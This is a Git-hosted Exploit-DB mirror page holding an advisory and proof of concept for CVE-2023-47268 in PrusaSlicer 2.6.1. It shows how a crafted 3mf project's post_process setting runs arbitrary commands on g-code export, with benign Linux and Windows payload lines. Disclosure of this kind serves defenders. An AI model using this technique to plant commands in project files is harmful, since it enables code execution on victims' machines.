bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/51983.txt
Exploit-DB aa67db6cea DB: 2024-04-13 
15 changes to exploits/shellcodes/ghdb

MinIO < 2024-01-31T20-20-33Z - Privilege Escalation

PrusaSlicer 2.6.1 - Arbitrary code execution

GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload

HTMLy Version v2.9.6 - Stored XSS

Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter

PopojiCMS Version 2.0.1 - Remote Command Execution

Quick CMS v6.7 en 2023 - 'password' SQLi

Service Provider Management System v1.0 - SQL Injection

WBCE 1.6.0 - Unauthenticated SQL injection

WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated)

Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS)

Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)

Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

Terratec dmx_6fire USB - Unquoted Service Path
2024-04-13 00:16:27 +00:00

32 lines
No EOL
2.3 KiB
Text
Raw Permalink Blame History

# Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export
# Date: 16/01/2024
# Exploit Author: Kamil Breński
# Vendor Homepage: https://www.prusa3d.com
# Software Link: https://github.com/prusa3d/PrusaSlicer
# Version: PrusaSlicer up to and including version 2.6.1
# Tested on: Windows and Linux
# CVE: CVE-2023-47268
==========================================================================================
1.) 3mf Metadata extension
==========================================================================================
PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way.
==========================================================================================
2.) PoC
==========================================================================================
For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:
```
; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"
```
Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code.
For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry:
```
; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) "
```
Reference in a new issue View git blame Copy permalink